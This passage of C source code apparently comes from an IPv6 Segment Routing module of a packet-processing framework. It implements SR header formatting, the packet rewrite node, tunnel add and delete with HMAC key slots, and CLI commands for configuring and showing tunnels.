(ip6_address_is_equal (&placeholder_addr, h->segments)) s = format (s, "\n (empty placeholder)"); else s = format (s, "\n %U", format_ip6_address, h->segments); s = format (s, "\n Policy List:"); pl_index = 1; /* to match the RFC text */ for (i = (h->first_segment + 1); i < max_segs; i++, pl_index++) { char *tag; char *tags[] = { " ", "InPE: ", "EgPE: ", "OrgSrc: " }; tag = tags[0]; if (pl_index >= 1 && pl_index <= 4) { int this_pl_flag = ip6_sr_policy_list_flags (flags_host_byte_order, pl_index); tag = tags[this_pl_flag]; } s = format (s, "\n %s%U", tag, format_ip6_address, h->segments + i); } return s; } /** * @brief Format function for decoding ip6_sr_header_t with length * * @param s u8 * - formatted string * @param args va_list * - ip6_header_t + ip6_sr_header_t * * @return formatted output string u8 * */ u8 * format_ip6_sr_header_with_length (u8 * s, va_list * args) { ip6_header_t *h = va_arg (*args, ip6_header_t *); u32 max_header_bytes = va_arg (*args, u32); uword header_bytes; header_bytes = sizeof (h[0]) + sizeof (ip6_sr_header_t); if (max_header_bytes != 0 && header_bytes > max_header_bytes) return format (s, "ip6_sr header truncated"); s = format (s, "IP6: %U\n", format_ip6_header, h, max_header_bytes); s = format (s, "SR: %U\n", format_ip6_sr_header, (ip6_sr_header_t *) (h + 1), 0 /* print_hmac */ , max_header_bytes); return s; } /** * @brief Defined valid next nodes * @note Cannot call replicate yet without DPDK */ #if DPDK > 0 #define foreach_sr_rewrite_next \ _(ERROR, "error-drop") \ _(IP6_LOOKUP, "ip6-lookup") \ _(SR_LOCAL, "sr-local") \ _(SR_REPLICATE,"sr-replicate") #else #define foreach_sr_rewrite_next \ _(ERROR, "error-drop") \ _(IP6_LOOKUP, "ip6-lookup") \ _(SR_LOCAL, "sr-local") #endif /* DPDK */ /** * @brief Struct for defined valid next nodes */ typedef enum { #define _(s,n) SR_REWRITE_NEXT_##s, foreach_sr_rewrite_next #undef _ SR_REWRITE_N_NEXT, } sr_rewrite_next_t; /** * @brief Struct for data for SR rewrite packet trace */ typedef struct { ip6_address_t src, dst; u16 length; u32 next_index; u32 tunnel_index; u8 sr[256]; } sr_rewrite_trace_t; /** * @brief Error strings for SR rewrite */ static char *sr_rewrite_error_strings[] = { #define sr_error(n,s) s, #include "sr_error.def" #undef sr_error }; /** * @brief Struct for SR rewrite error strings */ typedef enum { #define sr_error(n,s) SR_REWRITE_ERROR_##n, #include "sr_error.def" #undef sr_error SR_REWRITE_N_ERROR, } sr_rewrite_error_t; /** * @brief Format function for SR rewrite trace. */ u8 * format_sr_rewrite_trace (u8 * s, va_list * args) { CLIB_UNUSED (vlib_main_t * vm) = va_arg (*args, vlib_main_t *); CLIB_UNUSED (vlib_node_t * node) = va_arg (*args, vlib_node_t *); sr_rewrite_trace_t *t = va_arg (*args, sr_rewrite_trace_t *); ip6_sr_main_t *sm = &sr_main; ip6_sr_tunnel_t *tun = pool_elt_at_index (sm->tunnels, t->tunnel_index); ip6_fib_t *rx_fib, *tx_fib; rx_fib = ip6_fib_get (tun->rx_fib_index); tx_fib = ip6_fib_get (tun->tx_fib_index); s = format (s, "SR-REWRITE: next %s ip6 src %U dst %U len %u\n" " rx-fib-id %d tx-fib-id %d\n%U", (t->next_index == SR_REWRITE_NEXT_SR_LOCAL) ? "sr-local" : "ip6-lookup", format_ip6_address, &t->src, format_ip6_address, &t->dst, t->length, rx_fib->table_id, tx_fib->table_id, format_ip6_sr_header, t->sr, 0 /* print_hmac */ ); return s; } /** * @brief Main processing dual-loop for Segment Routing Rewrite * @node sr-rewrite * * @param vm vlib_main_t * * @param node vlib_node_runtime_t * * @param from_frame vlib_frame_t * * * @return from_frame->n_vectors uword */ static uword sr_rewrite (vlib_main_t * vm, vlib_node_runtime_t * node, vlib_frame_t * from_frame) { u32 n_left_from, next_index, *from, *to_next; ip6_main_t *im = &ip6_main; ip_lookup_main_t *lm = &im->lookup_main; ip6_sr_main_t *sm = &sr_main; u32 (*sr_local_cb) (vlib_main_t *, vlib_node_runtime_t *, vlib_buffer_t *, ip6_header_t *, ip6_sr_header_t *); sr_local_cb = sm->sr_local_cb; from = vlib_frame_vector_args (from_frame); n_left_from = from_frame->n_vectors; next_index = node->cached_next_index; while (n_left_from > 0) { u32 n_left_to_next; vlib_get_next_frame (vm, node, next_index, to_next, n_left_to_next); /* Note 2x loop disabled */ while (0 && n_left_from >= 4 && n_left_to_next >= 2) { u32 bi0, bi1; vlib_buffer_t *b0, *b1; ip6_header_t *ip0, *ip1; ip_adjacency_t *adj0, *adj1; ip6_sr_header_t *sr0, *sr1; ip6_sr_tunnel_t *t0, *t1; u32 next0 = SR_REWRITE_NEXT_IP6_LOOKUP; u32 next1 = SR_REWRITE_NEXT_IP6_LOOKUP; u16 new_l0 = 0; u16 new_l1 = 0; /* Prefetch next iteration. */ { vlib_buffer_t *p2, *p3; p2 = vlib_get_buffer (vm, from[2]); p3 = vlib_get_buffer (vm, from[3]); vlib_prefetch_buffer_header (p2, LOAD); vlib_prefetch_buffer_header (p3, LOAD); } bi0 = from[0]; bi1 = from[1]; to_next[0] = bi0; to_next[1] = bi1; from += 2; to_next += 2; n_left_to_next -= 2; n_left_from -= 2; b0 = vlib_get_buffer (vm, bi0); b1 = vlib_get_buffer (vm, bi1); /* * $$$ parse through header(s) to pick the point * where we punch in the SR extention header */ adj0 = ip_get_adjacency (lm, vnet_buffer (b0)->ip.adj_index[VLIB_TX]); adj1 = ip_get_adjacency (lm, vnet_buffer (b1)->ip.adj_index[VLIB_TX]); t0 = pool_elt_at_index (sm->tunnels, adj0->rewrite_header.sw_if_index); t1 = pool_elt_at_index (sm->tunnels, adj1->rewrite_header.sw_if_index); ASSERT (VLIB_BUFFER_PRE_DATA_SIZE >= ((word) vec_len (t0->rewrite)) + b0->current_data); ASSERT (VLIB_BUFFER_PRE_DATA_SIZE >= ((word) vec_len (t1->rewrite)) + b1->current_data); vnet_buffer (b0)->sw_if_index[VLIB_TX] = t0->tx_fib_index; vnet_buffer (b1)->sw_if_index[VLIB_TX] = t1->tx_fib_index; ip0 = vlib_buffer_get_current (b0); ip1 = vlib_buffer_get_current (b1); /* * SR-unaware service chaining case: pkt coming back from * service has the original dst address, and will already * have an SR header. If so, send it to sr-local */ if (PREDICT_FALSE (ip0->protocol == IPPROTO_IPV6_ROUTE)) { vlib_buffer_advance (b0, sizeof (ip0)); sr0 = (ip6_sr_header_t *) (ip0 + 1); new_l0 = clib_net_to_host_u16 (ip0->payload_length); next0 = SR_REWRITE_NEXT_SR_LOCAL; } else { /* * Copy data before the punch-in point left by the * required amount. Assume (for the moment) that only * the main packet header needs to be copied. */ clib_memcpy (((u8 *) ip0) - vec_len (t0->rewrite), ip0, sizeof (ip6_header_t)); vlib_buffer_advance (b0, -(word) vec_len (t0->rewrite)); ip0 = vlib_buffer_get_current (b0); sr0 = (ip6_sr_header_t *) (ip0 + 1); /* $$$ tune */ clib_memcpy (sr0, t0->rewrite, vec_len (t0->rewrite)); /* Fix the next header chain */ sr0->protocol = ip0->protocol; ip0->protocol = IPPROTO_IPV6_ROUTE; /* routing extension header */ new_l0 = clib_net_to_host_u16 (ip0->payload_length) + vec_len (t0->rewrite); ip0->payload_length = clib_host_to_net_u16 (new_l0); /* Copy dst address into the DA slot in the segment list */ clib_memcpy (sr0->segments, ip0->dst_address.as_u64, sizeof (ip6_address_t)); /* Rewrite the ip6 dst address with the first hop */ clib_memcpy (ip0->dst_address.as_u64, t0->first_hop.as_u64, sizeof (ip6_address_t)); sr_fix_hmac (sm, ip0, sr0); next0 = sr_local_cb ? sr_local_cb (vm, node, b0, ip0, sr0) : next0; /* * Ignore "do not rewrite" shtik in this path */ if (PREDICT_FALSE (next0 & 0x80000000)) { next0 ^= 0xFFFFFFFF; if (PREDICT_FALSE (next0 == SR_REWRITE_NEXT_ERROR)) b0->error = node->errors[SR_REWRITE_ERROR_APP_CALLBACK]; } } if (PREDICT_FALSE (ip1->protocol == IPPROTO_IPV6_ROUTE)) { vlib_buffer_advance (b1, sizeof (ip1)); sr1 = (ip6_sr_header_t *) (ip1 + 1); new_l1 = clib_net_to_host_u16 (ip1->payload_length); next1 = SR_REWRITE_NEXT_SR_LOCAL; } else { clib_memcpy (((u8 *) ip0) - vec_len (t0->rewrite), ip0, sizeof (ip6_header_t)); vlib_buffer_advance (b1, -(word) vec_len (t1->rewrite)); ip1 = vlib_buffer_get_current (b1); sr1 = (ip6_sr_header_t *) (ip1 + 1); clib_memcpy (sr1, t1->rewrite, vec_len (t1->rewrite)); sr1->protocol = ip1->protocol; ip1->protocol = IPPROTO_IPV6_ROUTE; new_l1 = clib_net_to_host_u16 (ip1->payload_length) + vec_len (t1->rewrite); ip1->payload_length = clib_host_to_net_u16 (new_l1); /* Copy dst address into the DA slot in the segment list */ clib_memcpy (sr1->segments, ip1->dst_address.as_u64, sizeof (ip6_address_t)); /* Rewrite the ip6 dst address with the first hop */ clib_memcpy (ip1->dst_address.as_u64, t1->first_hop.as_u64, sizeof (ip6_address_t)); sr_fix_hmac (sm, ip1, sr1); next1 = sr_local_cb ? sr_local_cb (vm, node, b1, ip1, sr1) : next1; /* * Ignore "do not rewrite" shtik in this path */ if (PREDICT_FALSE (next1 & 0x80000000)) { next1 ^= 0xFFFFFFFF; if (PREDICT_FALSE (next1 == SR_REWRITE_NEXT_ERROR)) b1->error = node->errors[SR_REWRITE_ERROR_APP_CALLBACK]; } } if (PREDICT_FALSE (b0->flags & VLIB_BUFFER_IS_TRACED)) { sr_rewrite_trace_t *tr = vlib_add_trace (vm, node, b0, sizeof (*tr)); tr->tunnel_index = t0 - sm->tunnels; clib_memcpy (tr->src.as_u8, ip0->src_address.as_u8, sizeof (tr->src.as_u8)); clib_memcpy (tr->dst.as_u8, ip0->dst_address.as_u8, sizeof (tr->dst.as_u8)); tr->length = new_l0; tr->next_index = next0; clib_memcpy (tr->sr, sr0, sizeof (tr->sr)); } if (PREDICT_FALSE (b1->flags & VLIB_BUFFER_IS_TRACED)) { sr_rewrite_trace_t *tr = vlib_add_trace (vm, node, b1, sizeof (*tr)); tr->tunnel_index = t1 - sm->tunnels; clib_memcpy (tr->src.as_u8, ip1->src_address.as_u8, sizeof (tr->src.as_u8)); clib_memcpy (tr->dst.as_u8, ip1->dst_address.as_u8, sizeof (tr->dst.as_u8)); tr->length = new_l1; tr->next_index = next1; clib_memcpy (tr->sr, sr1, sizeof (tr->sr)); } vlib_validate_buffer_enqueue_x2 (vm, node, next_index, to_next, n_left_to_next, bi0, bi1, next0, next1); } while (n_left_from > 0 && n_left_to_next > 0) { u32 bi0; vlib_buffer_t *b0; ip6_header_t *ip0 = 0; ip_adjacency_t *adj0; ip6_sr_header_t *sr0 = 0; ip6_sr_tunnel_t *t0; u32 next0 = SR_REWRITE_NEXT_IP6_LOOKUP; u16 new_l0 = 0; bi0 = from[0]; to_next[0] = bi0; from += 1; to_next += 1; n_left_from -= 1; n_left_to_next -= 1; b0 = vlib_get_buffer (vm, bi0); /* * $$$ parse through header(s) to pick the point * where we punch in the SR extention header */ adj0 = ip_get_adjacency (lm, vnet_buffer (b0)->ip.adj_index[VLIB_TX]); t0 = pool_elt_at_index (sm->tunnels, adj0->rewrite_header.sw_if_index); #if DPDK > 0 /* Cannot call replication node yet without DPDK */ /* add a replication node */ if (PREDICT_FALSE (t0->policy_index != ~0)) { vnet_buffer (b0)->ip.save_protocol = t0->policy_index; next0 = SR_REWRITE_NEXT_SR_REPLICATE; goto trace0; } #endif /* DPDK */ ASSERT (VLIB_BUFFER_PRE_DATA_SIZE >= ((word) vec_len (t0->rewrite)) + b0->current_data); vnet_buffer (b0)->sw_if_index[VLIB_TX] = t0->tx_fib_index; ip0 = vlib_buffer_get_current (b0); /* * SR-unaware service chaining case: pkt coming back from * service has the original dst address, and will already * have an SR header. If so, send it to sr-local */ if (PREDICT_FALSE (ip0->protocol == IPPROTO_IPV6_ROUTE)) { vlib_buffer_advance (b0, sizeof (ip0)); sr0 = (ip6_sr_header_t *) (ip0 + 1); new_l0 = clib_net_to_host_u16 (ip0->payload_length); next0 = SR_REWRITE_NEXT_SR_LOCAL; } else { /* * Copy data before the punch-in point left by the * required amount. Assume (for the moment) that only * the main packet header needs to be copied. */ clib_memcpy (((u8 *) ip0) - vec_len (t0->rewrite), ip0, sizeof (ip6_header_t)); vlib_buffer_advance (b0, -(word) vec_len (t0->rewrite)); ip0 = vlib_buffer_get_current (b0); sr0 = (ip6_sr_header_t *) (ip0 + 1); /* $$$ tune */ clib_memcpy (sr0, t0->rewrite, vec_len (t0->rewrite)); /* Fix the next header chain */ sr0->protocol = ip0->protocol; ip0->protocol = IPPROTO_IPV6_ROUTE; /* routing extension header */ new_l0 = clib_net_to_host_u16 (ip0->payload_length) + vec_len (t0->rewrite); ip0->payload_length = clib_host_to_net_u16 (new_l0); /* Copy dst address into the DA slot in the segment list */ clib_memcpy (sr0->segments, ip0->dst_address.as_u64, sizeof (ip6_address_t)); /* Rewrite the ip6 dst address with the first hop */ clib_memcpy (ip0->dst_address.as_u64, t0->first_hop.as_u64, sizeof (ip6_address_t)); sr_fix_hmac (sm, ip0, sr0); next0 = sr_local_cb ? sr_local_cb (vm, node, b0, ip0, sr0) : next0; /* * Ignore "do not rewrite" shtik in this path */ if (PREDICT_FALSE (next0 & 0x80000000)) { next0 ^= 0xFFFFFFFF; if (PREDICT_FALSE (next0 == SR_REWRITE_NEXT_ERROR)) b0->error = node->errors[SR_REWRITE_ERROR_APP_CALLBACK]; } } #if DPDK > 0 /* Cannot run replicate without DPDK and only replicate uses this label */ trace0: #endif /* DPDK */ if (PREDICT_FALSE (b0->flags & VLIB_BUFFER_IS_TRACED)) { sr_rewrite_trace_t *tr = vlib_add_trace (vm, node, b0, sizeof (*tr)); tr->tunnel_index = t0 - sm->tunnels; if (ip0) { memcpy (tr->src.as_u8, ip0->src_address.as_u8, sizeof (tr->src.as_u8)); memcpy (tr->dst.as_u8, ip0->dst_address.as_u8, sizeof (tr->dst.as_u8)); } tr->length = new_l0; tr->next_index = next0; clib_memcpy (tr->sr, sr0, sizeof (tr->sr)); } vlib_validate_buffer_enqueue_x1 (vm, node, next_index, to_next, n_left_to_next, bi0, next0); } vlib_put_next_frame (vm, node, next_index, n_left_to_next); } return from_frame->n_vectors; } /* *INDENT-OFF* */ VLIB_REGISTER_NODE (sr_rewrite_node) = { .function = sr_rewrite, .name = "sr-rewrite", /* Takes a vector of packets. */ .vector_size = sizeof (u32), .format_trace = format_sr_rewrite_trace, .format_buffer = format_ip6_sr_header_with_length, .n_errors = SR_REWRITE_N_ERROR, .error_strings = sr_rewrite_error_strings, .runtime_data_bytes = 0, .n_next_nodes = SR_REWRITE_N_NEXT, .next_nodes = { #define _(s,n) [SR_REWRITE_NEXT_##s] = n, foreach_sr_rewrite_next #undef _ }, }; /* *INDENT-ON* */ VLIB_NODE_FUNCTION_MULTIARCH (sr_rewrite_node, sr_rewrite) static int ip6_delete_route_no_next_hop (ip6_address_t * dst_address_arg, u32 dst_address_length, u32 rx_table_id) { fib_prefix_t pfx = { .fp_len = dst_address_length, .fp_proto = FIB_PROTOCOL_IP6, .fp_addr = { .ip6 = *dst_address_arg, } }; fib_table_entry_delete (fib_table_id_find_fib_index (FIB_PROTOCOL_IP6, rx_table_id), &pfx, FIB_SOURCE_SR); return 0; } /** * @brief Find or add if not found - HMAC shared secret * * @param sm ip6_sr_main_t * * @param secret u8 * * @param indexp u32 * * * @return ip6_sr_hmac_key_t * */ static ip6_sr_hmac_key_t * find_or_add_shared_secret (ip6_sr_main_t * sm, u8 * secret, u32 * indexp) { uword *p; ip6_sr_hmac_key_t *key = 0; int i; p = hash_get_mem (sm->hmac_key_by_shared_secret, secret); if (p) { key = vec_elt_at_index (sm->hmac_keys, p[0]); if (indexp) *indexp = p[0]; return (key); } /* Specific key ID? */ if (indexp && *indexp) { vec_validate (sm->hmac_keys, *indexp); key = sm->hmac_keys + *indexp; } else { for (i = 0; i < vec_len (sm->hmac_keys); i++) { if (sm->hmac_keys[i].shared_secret == 0) { key = sm->hmac_keys + i; goto found; } } vec_validate (sm->hmac_keys, i); key = sm->hmac_keys + i; found: ; } key->shared_secret = vec_dup (secret); hash_set_mem (sm->hmac_key_by_shared_secret, key->shared_secret, key - sm->hmac_keys); if (indexp) *indexp = key - sm->hmac_keys; return (key); } /** * @brief Add or Delete a Segment Routing tunnel. * * @param a ip6_sr_add_del_tunnel_args_t * * * @return retval int */ int ip6_sr_add_del_tunnel (ip6_sr_add_del_tunnel_args_t * a) { ip6_main_t *im = &ip6_main; ip6_sr_tunnel_key_t key; ip6_sr_tunnel_t *t; uword *p, *n; ip6_sr_header_t *h = 0; u32 header_length; ip6_address_t *addrp, *this_address; ip6_sr_main_t *sm = &sr_main; u8 *key_copy; u32 rx_fib_index, tx_fib_index; u32 hmac_key_index_u32; u8 hmac_key_index = 0; ip6_sr_policy_t *pt; int i; dpo_id_t dpo = DPO_NULL; /* Make sure that the rx FIB exists */ p = hash_get (im->fib_index_by_table_id, a->rx_table_id); if (p == 0) return -3; /* remember the FIB index */ rx_fib_index = p[0]; /* Make sure that the supplied FIB exists */ p = hash_get (im->fib_index_by_table_id, a->tx_table_id); if (p == 0) return -4; /* remember the FIB index */ tx_fib_index = p[0]; clib_memcpy (key.src.as_u8, a->src_address->as_u8, sizeof (key.src)); clib_memcpy (key.dst.as_u8, a->dst_address->as_u8, sizeof (key.dst)); /* When adding a tunnel: * - If a "name" is given, it must not exist. * - The "key" is always checked, and must not exist. * When deleting a tunnel: * - If the "name" is given, and it exists, then use it. * - If the "name" is not given, use the "key". * - If the "name" and the "key" are given, then both must point to the same * thing. */ /* Lookup the key */ p = hash_get_mem (sm->tunnel_index_by_key, &key); /* If the name is given, look it up */ if (a->name) n = hash_get_mem (sm->tunnel_index_by_name, a->name); else n = 0; /* validate key/name parameters */ if (!a->is_del) /* adding a tunnel */ { if (a->name && n) /* name given & exists already */ return -1; if (p) /* key exists already */ return -1; } else /* deleting a tunnel */ { if (!p) /* key doesn't exist */ return -2; if (a->name && !n) /* name given & it doesn't exist */ return -2; if (n) /* name given & found */ { if (n[0] != p[0]) /* name and key do not point to the same thing */ return -2; } } if (a->is_del) /* delete the tunnel */ { hash_pair_t *hp; /* Delete existing tunnel */ t = pool_elt_at_index (sm->tunnels, p[0]); ip6_delete_route_no_next_hop (&t->key.dst, t->dst_mask_width, a->rx_table_id); vec_free (t->rewrite); /* Remove tunnel from any policy if associated */ if (t->policy_index != ~0) { pt = pool_elt_at_index (sm->policies, t->policy_index); for (i = 0; i < vec_len (pt->tunnel_indices); i++) { if (pt->tunnel_indices[i] == t - sm->tunnels) { vec_delete (pt->tunnel_indices, 1, i); goto found; } } clib_warning ("Tunnel index %d not found in policy_index %d", t - sm->tunnels, pt - sm->policies); found: /* If this is last tunnel in the policy, clean up the policy too */ if (vec_len (pt->tunnel_indices) == 0) { hash_unset_mem (sm->policy_index_by_policy_name, pt->name); vec_free (pt->name); pool_put (sm->policies, pt); } } /* Clean up the tunnel by name */ if (t->name) { hash_unset_mem (sm->tunnel_index_by_name, t->name); vec_free (t->name); } pool_put (sm->tunnels, t); hp = hash_get_pair (sm->tunnel_index_by_key, &key); key_copy = (void *) (hp->key); hash_unset_mem (sm->tunnel_index_by_key, &key); vec_free (key_copy); return 0; } /* create a new tunnel */ pool_get (sm->tunnels, t); memset (t, 0, sizeof (*t)); t->policy_index = ~0; clib_memcpy (&t->key, &key, sizeof (t->key)); t->dst_mask_width = a->dst_mask_width; t->rx_fib_index = rx_fib_index; t->tx_fib_index = tx_fib_index; if (!vec_len (a->segments)) /* there must be at least one segment... */ return -4; /* The first specified hop goes right into the dst address */ clib_memcpy (&t->first_hop, &a->segments[0], sizeof (ip6_address_t)); /* * Create the sr header rewrite string * The list of segments needs an extra slot for the ultimate destination * which is taken from the packet we add the SRH to. */ header_length = sizeof (*h) + sizeof (ip6_address_t) * (vec_len (a->segments) + 1 + vec_len (a->tags)); if (a->shared_secret) { /* Allocate a new key slot if we don't find the secret key */ hmac_key_index_u32 = 0; (void) find_or_add_shared_secret (sm, a->shared_secret, &hmac_key_index_u32); /* Hey Vinz Clortho: Gozzer is pissed.. you're out of keys! */ if (hmac_key_index_u32 >= 256) return -5; hmac_key_index = hmac_key_index_u32; header_length += SHA256_DIGEST_LENGTH; } vec_validate (t->rewrite, header_length - 1); h = (ip6_sr_header_t *) t->rewrite; h->protocol = 0xFF; /* we don't know yet */ h->length = (header_length / 8) - 1; h->type = ROUTING_HEADER_TYPE_SR; /* first_segment and segments_left need to have the index of the last * element in the list; a->segments has one element less than ends up * in the header (it does not have the DA in it), so vec_len(a->segments) * is the value we want. */ h->first_segment = h->segments_left = vec_len (a->segments); if (a->shared_secret) h->hmac_key = hmac_key_index & 0xFF; h->flags = a->flags_net_byte_order; /* Paint on the segment list, in reverse. * This is offset by one to leave room at the start for the ultimate * destination. */ addrp = h->segments + vec_len (a->segments); vec_foreach (this_address, a->segments) { clib_memcpy (addrp->as_u8, this_address->as_u8, sizeof (ip6_address_t)); addrp--; } /* * Since the ultimate destination address is not yet known, set that slot * to a value we will instantly recognize as bogus. */ memset (h->segments, 0xfe, sizeof (ip6_address_t)); /* Paint on the tag list, not reversed */ addrp = h->segments + vec_len (a->segments); vec_foreach (this_address, a->tags) { clib_memcpy (addrp->as_u8, this_address->as_u8, sizeof (ip6_address_t)); addrp++; } key_copy = vec_new (ip6_sr_tunnel_key_t, 1); clib_memcpy (key_copy, &key, sizeof (ip6_sr_tunnel_key_t)); hash_set_mem (sm->tunnel_index_by_key, key_copy, t - sm->tunnels); /* * Stick the tunnel index into the rewrite header. * * Unfortunately, inserting an SR header according to the various * RFC's requires parsing through the ip6 header, perhaps consing a * buffer onto the head of the vlib_buffer_t, etc. We don't use the * normal reverse bcopy rewrite code. * * We don't handle ugly RFC-related cases yet, but I'm sure PL will complain * at some point... */ dpo_set (&dpo, sr_dpo_type, DPO_PROTO_IP6, t - sm->tunnels); fib_prefix_t pfx = { .fp_proto = FIB_PROTOCOL_IP6, .fp_len = a->dst_mask_width, .fp_addr = { .ip6 = *a->dst_address, } }; fib_table_entry_special_dpo_add (rx_fib_index, &pfx, FIB_SOURCE_SR, FIB_ENTRY_FLAG_EXCLUSIVE, &dpo); dpo_reset (&dpo); if (a->policy_name) { p = hash_get_mem (sm->policy_index_by_policy_name, a->policy_name); if (p) { pt = pool_elt_at_index (sm->policies, p[0]); } else /* no policy, lets create one */ { pool_get (sm->policies, pt); memset (pt, 0, sizeof (*pt)); pt->name = format (0, "%s%c", a->policy_name, 0); hash_set_mem (sm->policy_index_by_policy_name, pt->name, pt - sm->policies); p = hash_get_mem (sm->policy_index_by_policy_name, a->policy_name); } vec_add1 (pt->tunnel_indices, t - sm->tunnels); if (p == 0) clib_warning ("p is NULL!"); t->policy_index = p ? p[0] : ~0; /* equiv. to (pt - sm->policies) */ } if (a->name) { t->name = format (0, "%s%c", a->name, 0); hash_set_mem (sm->tunnel_index_by_name, t->name, t - sm->tunnels); } return 0; } /** * @brief no-op lock function. * The lifetime of the SR entry is managed by the control plane */ static void sr_dpo_lock (dpo_id_t * dpo) { } /** * @brief no-op unlock function. * The lifetime of the SR entry is managed by the control plane */ static void sr_dpo_unlock (dpo_id_t * dpo) { } u8 * format_sr_dpo (u8 * s, va_list * args) { index_t index = va_arg (*args, index_t); CLIB_UNUSED (u32 indent) = va_arg (*args, u32); return (format (s, "SR: tunnel:[%d]", index)); } const static dpo_vft_t sr_vft = { .dv_lock = sr_dpo_lock, .dv_unlock = sr_dpo_unlock, .dv_format = format_sr_dpo, }; const static char *const sr_ip6_nodes[] = { "sr-rewrite", NULL, }; const static char *const *const sr_nodes[DPO_PROTO_NUM] = { [DPO_PROTO_IP6] = sr_ip6_nodes, }; /** * @brief CLI parser for Add or Delete a Segment Routing tunnel. * * @param vm vlib_main_t * * @param input unformat_input_t * * @param cmd vlib_cli_command_t * * * @return error clib_error_t * */ static clib_error_t * sr_add_del_tunnel_command_fn (vlib_main_t * vm, unformat_input_t * input, vlib_cli_command_t * cmd) { int is_del = 0; ip6_address_t src_address; int src_address_set = 0; ip6_address_t dst_address; u32 dst_mask_width; int dst_address_set = 0; u16 flags = 0; u8 *shared_secret = 0; u8 *name = 0; u8 *policy_name = 0; u32 rx_table_id = 0; u32 tx_table_id = 0; ip6_address_t *segments = 0; ip6_address_t *this_seg; ip6_address_t *tags = 0; ip6_address_t *this_tag; ip6_sr_add_del_tunnel_args_t _a, *a = &_a; ip6_address_t next_address, tag; int pl_index; int rv; while (unformat_check_input (input) != UNFORMAT_END_OF_INPUT) { if (unformat (input, "del")) is_del = 1; else if (unformat (input, "rx-fib-id %d", &rx_table_id)) ; else if (unformat (input, "tx-fib-id %d", &tx_table_id)) ; else if (unformat (input, "src %U", unformat_ip6_address, &src_address)) src_address_set = 1; else if (unformat (input, "name %s", &name)) ; else if (unformat (input, "policy %s", &policy_name)) ; else if (unformat (input, "dst %U/%d", unformat_ip6_address, &dst_address, &dst_mask_width)) dst_address_set = 1; else if (unformat (input, "next %U", unformat_ip6_address, &next_address)) { vec_add2 (segments, this_seg, 1); clib_memcpy (this_seg->as_u8, next_address.as_u8, sizeof (*this_seg)); } else if (unformat (input, "tag %U", unformat_ip6_address, &tag)) { vec_add2 (tags, this_tag, 1); clib_memcpy (this_tag->as_u8, tag.as_u8, sizeof (*this_tag)); } else if (unformat (input, "clean")) flags |= IP6_SR_HEADER_FLAG_CLEANUP; else if (unformat (input, "protected")) flags |= IP6_SR_HEADER_FLAG_PROTECTED; else if (unformat (input, "key %s", &shared_secret)) /* Do not include the trailing NULL byte. Guaranteed interop issue */ _vec_len (shared_secret) -= 1; else if (unformat (input, "InPE %d", &pl_index)) { if (pl_index <= 0 || pl_index > 4) { pl_index_range_error: return clib_error_return (0, "Policy List Element Index %d out of range (1-4)", pl_index); } flags |= IP6_SR_HEADER_FLAG_PL_ELT_INGRESS_PE << ip6_sr_policy_list_shift_from_index (pl_index); } else if (unformat (input, "EgPE %d", &pl_index)) { if (pl_index <= 0 || pl_index > 4) goto pl_index_range_error; flags |= IP6_SR_HEADER_FLAG_PL_ELT_EGRESS_PE << ip6_sr_policy_list_shift_from_index (pl_index); } else if (unformat (input, "OrgSrc %d", &pl_index)) { if (pl_index <= 0 || pl_index > 4) goto pl_index_range_error; flags |= IP6_SR_HEADER_FLAG_PL_ELT_ORIG_SRC_ADDR << ip6_sr_policy_list_shift_from_index (pl_index); } else break; } if (!src_address_set) return clib_error_return (0, "src address required"); if (!dst_address_set) return clib_error_return (0, "dst address required"); if (!segments) return clib_error_return (0, "at least one sr segment required"); memset (a, 0, sizeof (*a)); a->src_address = &src_address; a->dst_address = &dst_address; a->dst_mask_width = dst_mask_width; a->segments = segments; a->tags = tags; a->flags_net_byte_order = clib_host_to_net_u16 (flags); a->is_del = is_del; a->rx_table_id = rx_table_id; a->tx_table_id = tx_table_id; a->shared_secret = shared_secret; if (vec_len (name)) a->name = name; else a->name = 0; if (vec_len (policy_name)) a->policy_name = policy_name; else a->policy_name = 0; rv = ip6_sr_add_del_tunnel (a); vec_free (segments); vec_free (tags); vec_free (shared_secret); switch (rv) { case 0: break; case -1: return clib_error_return (0, "SR tunnel src %U dst %U already exists", format_ip6_address, &src_address, format_ip6_address, &dst_address); case -2: return clib_error_return (0, "SR tunnel src %U dst %U does not exist", format_ip6_address, &src_address, format_ip6_address, &dst_address); case -3: return clib_error_return (0, "FIB table %d does not exist", rx_table_id); case -4: return clib_error_return (0, "At least one segment is required"); default: return clib_error_return (0, "BUG: ip6_sr_add_del_tunnel returns %d", rv); } return 0; } /* *INDENT-OFF* */ VLIB_CLI_COMMAND (sr_tunnel_command, static) = { .path = "sr tunnel", .short_help = "sr tunnel [del] [name <name>] src <addr> dst <addr> [next <addr>] " "[clean] [reroute] [key <secret>] [policy <policy_name>]" "[rx-fib-id <fib_id>] [tx-fib-id <fib_id>]", .function = sr_add_del_tunnel_command_fn, }; /* *INDENT-ON* */ /** * @brief Display Segment Routing tunnel * * @param vm vlib_main_t * * @param t ip6_sr_tunnel_t * * */ void ip6_sr_tunnel_display (vlib_main_t * vm, ip6_sr_tunnel_t * t) { ip6_sr_main_t *sm = &sr_main; ip6_fib_t *rx_fib, *tx_fib; ip6_sr_policy_t *pt; rx_fib = ip6_fib_get (t->rx_fib_index); tx_fib = ip6_fib_get (t->tx_fib_index); if (t->name) vlib_cli_output (vm, "sr tunnel name: %s", (char *) t->name); vlib_cli_output (vm, "src %U dst %U first hop %U", format_ip6_address, &t->key.src, format_ip6_address, &t->key.dst, format_ip6_address, &t->first_hop); vlib_cli_output (vm, " rx-fib-id %d tx-fib-id %d", rx_fib->table_id, tx_fib->table_id); vlib_cli_output (vm, " sr: %U", format_ip6_sr_header, t->rewrite, 0 /* print_hmac */ ); if (t->policy_index != ~0) { pt = pool_elt_at_index (sm->policies, t->policy_index); vlib_cli_output (vm, "sr policy: %s", (char *) pt->name); } vlib_cli_output (vm, "-------"); return; } /** * @brief CLI Parser for Display Segment Routing tunnel * * @param vm vlib_main_t * * @param input unformat_input_t * * @param cmd vlib_cli_command_t * * * @return error clib_error_t * */ static clib_error_t * show_sr_tunnel_fn (vlib_main_t * vm, unformat_input_t * input, vlib_cli_command_t * cmd) { static ip6_sr_tunnel_t **tunnels; ip6_sr_tunnel_t *t; ip6_sr_main_t *sm = &sr_main; int i; uword *p = 0; u8 *name = 0; while (unformat_check_input (input) != UNFORMAT_END_OF_INPUT) { if (unformat (input, "name %s", &name)) { p = hash_get_mem (sm->tunnel_index_by_name, name); if (!p) vlib_cli_output (vm, "No SR tunnel with name: %s. Showing all.", name); } else break; } vec_reset_length (tunnels); if 